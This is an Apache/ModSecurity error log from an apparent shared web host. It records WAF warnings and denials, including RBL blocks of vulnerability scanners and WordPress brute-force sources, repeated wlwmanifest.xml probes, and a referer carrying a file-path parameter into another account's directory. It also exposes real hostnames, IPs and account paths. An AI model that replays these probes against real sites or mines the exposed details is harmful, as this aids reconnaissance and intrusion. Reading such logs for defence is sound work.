[Tue May 26 15:29:49.432440 2026] [security2:error] [pid 715645:tid 715888] [client 64.89.162.36:46288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "services.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDbgAAAHE"]
[Tue May 26 15:29:49.586706 2026] [security2:error] [pid 715645:tid 715803] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFXVGgMGh8k213RgDvgAAABw"]
[Tue May 26 15:29:49.895516 2026] [security2:error] [pid 715645:tid 715852] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFXVGgMGh8k213RgDywAAAE0"]
[Tue May 26 15:29:50.236463 2026] [security2:error] [pid 715645:tid 715836] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFnVGgMGh8k213RgD3gAAAD0"]
[Tue May 26 15:29:51.048705 2026] [security2:error] [pid 715645:tid 715781] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFnVGgMGh8k213RgD8wAAAAY"]
[Tue May 26 15:29:51.101809 2026] [security2:error] [pid 715645:tid 715899] [client 14.173.238.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvF3VGgMGh8k213RgD-QAAAHw"]
[Tue May 26 15:29:51.314172 2026] [security2:error] [pid 715645:tid 715796] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvFnVGgMGh8k213RgD8AAAABU"]
[Tue May 26 15:29:51.351484 2026] [security2:error] [pid 715645:tid 715875] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvF3VGgMGh8k213RgEAwAAAGQ"]
[Tue May 26 15:29:51.663243 2026] [security2:error] [pid 715645:tid 715812] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvF3VGgMGh8k213RgEDQAAACU"]
[Tue May 26 15:29:51.912782 2026] [core:crit] [pid 715645:tid 715861] (13)Permission denied: [client 17.241.219.175:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:52.112410 2026] [proxy:error] [pid 715645:tid 715884] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:29:52.112456 2026] [proxy_http:error] [pid 715645:tid 715884] [client 43.130.74.193:40414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:29:52.113064 2026] [proxy:error] [pid 715645:tid 715884] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:29:52.113101 2026] [proxy_http:error] [pid 715645:tid 715884] [client 43.130.74.193:40414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:29:52.143642 2026] [core:crit] [pid 715645:tid 715825] (13)Permission denied: [client 17.241.219.175:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:53.133360 2026] [core:crit] [pid 715645:tid 715881] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:53.236889 2026] [security2:error] [pid 715645:tid 715858] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGXVGgMGh8k213RgEQAAAAFM"]
[Tue May 26 15:29:53.673609 2026] [security2:error] [pid 715645:tid 715839] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvGXVGgMGh8k213RgEQwAAAEA"]
[Tue May 26 15:29:53.787518 2026] [security2:error] [pid 715645:tid 715782] [client 185.92.25.53:47127] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGXVGgMGh8k213RgEVQAAAAc"]
[Tue May 26 15:29:54.035684 2026] [security2:error] [pid 715645:tid 715828] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGXVGgMGh8k213RgEYgAAADU"]
[Tue May 26 15:29:54.039949 2026] [core:crit] [pid 715645:tid 715860] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:54.369258 2026] [security2:error] [pid 715645:tid 715808] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGnVGgMGh8k213RgEcAAAACE"]
[Tue May 26 15:29:54.663823 2026] [security2:error] [pid 715645:tid 715876] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGnVGgMGh8k213RgEeQAAAGU"]
[Tue May 26 15:29:54.943254 2026] [security2:error] [pid 715645:tid 715870] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvGnVGgMGh8k213RgEggAAAF8"]
[Tue May 26 15:29:55.291121 2026] [core:crit] [pid 715645:tid 715847] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:55.895486 2026] [security2:error] [pid 715645:tid 715844] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvG3VGgMGh8k213RgEmQAAAEU"]
[Tue May 26 15:29:55.932828 2026] [security2:error] [pid 715645:tid 715784] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvG3VGgMGh8k213RgErAAAAAk"]
[Tue May 26 15:29:56.104656 2026] [security2:error] [pid 715645:tid 715710] [remote 74.7.241.58:52568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVvHHVGgMGh8k213RgEsQAAEkA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes/Requests
[Tue May 26 15:29:56.224666 2026] [security2:error] [pid 715645:tid 715859] [client 185.92.25.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvHHVGgMGh8k213RgEtQAAAFQ"]
[Tue May 26 15:29:56.506319 2026] [security2:error] [pid 715645:tid 715852] [client 185.92.25.53:47127] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvHHVGgMGh8k213RgEvQAAAE0"]
[Tue May 26 15:29:56.541168 2026] [core:crit] [pid 715645:tid 715872] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:56.648645 2026] [security2:error] [pid 715645:tid 715868] [client 49.13.24.81:44560] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVvHHVGgMGh8k213RgEsgAAAF0"], referer: https://thegoodsporting.com
[Tue May 26 15:29:57.132054 2026] [security2:error] [pid 715645:tid 715857] [client 101.249.63.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvHXVGgMGh8k213RgE0AAAAFI"]
[Tue May 26 15:29:57.684679 2026] [security2:error] [pid 715645:tid 715817] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvHXVGgMGh8k213RgE3QAAACo"]
[Tue May 26 15:29:57.793660 2026] [core:crit] [pid 715645:tid 715896] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:57.895162 2026] [security2:error] [pid 715645:tid 715814] [client 113.168.254.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvHXVGgMGh8k213RgE6AAAACc"]
[Tue May 26 15:29:59.042310 2026] [core:crit] [pid 715645:tid 715857] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:30:00.301631 2026] [core:crit] [pid 715645:tid 715876] (13)Permission denied: [client 17.241.75.154:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:30:00.531328 2026] [security2:error] [pid 715645:tid 715817] [client 62.244.225.226:47949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVvIHVGgMGh8k213RgFJwAAACo"]
[Tue May 26 15:30:00.608601 2026] [security2:error] [pid 715645:tid 715814] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvIHVGgMGh8k213RgFKgAAACc"]
[Tue May 26 15:30:00.846592 2026] [security2:error] [pid 715645:tid 715781] [client 172.225.78.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVvH3VGgMGh8k213RgFEAAAAAY"]
[Tue May 26 15:30:01.361331 2026] [security2:error] [pid 715645:tid 715717] [remote 123.30.233.13:39020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVvIXVGgMGh8k213RgFSAAAG0c"]
[Tue May 26 15:30:01.569700 2026] [autoindex:error] [pid 715645:tid 715889] [client 34.148.143.3:64903] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:02.053882 2026] [security2:error] [pid 715645:tid 715778] [client 34.148.143.3:64903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.143.148.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "midrivermarina.com"] [uri "/xmlrpc.php"] [unique_id "ahVvIXVGgMGh8k213RgFZQAAAAM"]
[Tue May 26 15:30:02.861415 2026] [security2:error] [pid 715645:tid 715838] [client 34.148.143.3:52866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVvInVGgMGh8k213RgFfgAAAD8"]
[Tue May 26 15:30:03.088029 2026] [security2:error] [pid 715645:tid 715867] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvInVGgMGh8k213RgFdwAAAFw"]
[Tue May 26 15:30:03.155878 2026] [security2:error] [pid 715645:tid 715866] [client 34.148.143.3:51124] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVvI3VGgMGh8k213RgFhgAAAFs"]
[Tue May 26 15:30:03.388833 2026] [security2:error] [pid 715645:tid 715803] [client 201.220.22.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvI3VGgMGh8k213RgFkAAAABw"]
[Tue May 26 15:30:03.532006 2026] [security2:error] [pid 715645:tid 715824] [client 34.148.143.3:59800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVvI3VGgMGh8k213RgFkwAAADE"]
[Tue May 26 15:30:04.030312 2026] [security2:error] [pid 715645:tid 715849] [client 34.148.143.3:56791] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJHVGgMGh8k213RgFnQAAAEo"]
[Tue May 26 15:30:04.449609 2026] [security2:error] [pid 715645:tid 715807] [client 34.148.143.3:50311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJHVGgMGh8k213RgFqwAAACA"]
[Tue May 26 15:30:04.986832 2026] [security2:error] [pid 715645:tid 715808] [client 34.148.143.3:52242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJHVGgMGh8k213RgFvQAAACE"]
[Tue May 26 15:30:05.303286 2026] [security2:error] [pid 715645:tid 715831] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvJHVGgMGh8k213RgFuQAAADg"]
[Tue May 26 15:30:05.361072 2026] [security2:error] [pid 715645:tid 715796] [client 34.148.143.3:55814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJXVGgMGh8k213RgFzQAAABU"]
[Tue May 26 15:30:05.758668 2026] [security2:error] [pid 715645:tid 715896] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF5gAAeUw"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.764182 2026] [security2:error] [pid 715645:tid 715891] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF5wAAdD0"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.910895 2026] [security2:error] [pid 715645:tid 715812] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF7QAAJV4"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.915291 2026] [security2:error] [pid 715645:tid 715814] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF9QAAJwM"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.919317 2026] [security2:error] [pid 715645:tid 715887] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF7wAAcHY"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.921485 2026] [security2:error] [pid 715645:tid 715872] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF9wAAYXc"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.923377 2026] [security2:error] [pid 715645:tid 715838] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF7AAAP3o"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.923795 2026] [security2:error] [pid 715645:tid 715893] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF8QAAdkQ"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.929426 2026] [security2:error] [pid 715645:tid 715833] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF8wAAOgE"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.931828 2026] [security2:error] [pid 715645:tid 715895] [client 34.148.143.3:64855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJXVGgMGh8k213RgGBQAAAHg"]
[Tue May 26 15:30:05.935676 2026] [security2:error] [pid 715645:tid 715800] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF8gAAGX0"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.939159 2026] [security2:error] [pid 715645:tid 715870] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF8AAAX2I"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.939490 2026] [security2:error] [pid 715645:tid 715816] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF7gAAKX8"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.940002 2026] [security2:error] [pid 715645:tid 715845] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF9gAARj4"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.940996 2026] [security2:error] [pid 715645:tid 715836] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF_QAAPRY"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.941809 2026] [security2:error] [pid 715645:tid 715877] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF-AAAZlI"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.942433 2026] [security2:error] [pid 715645:tid 715828] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF9AAANT8"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
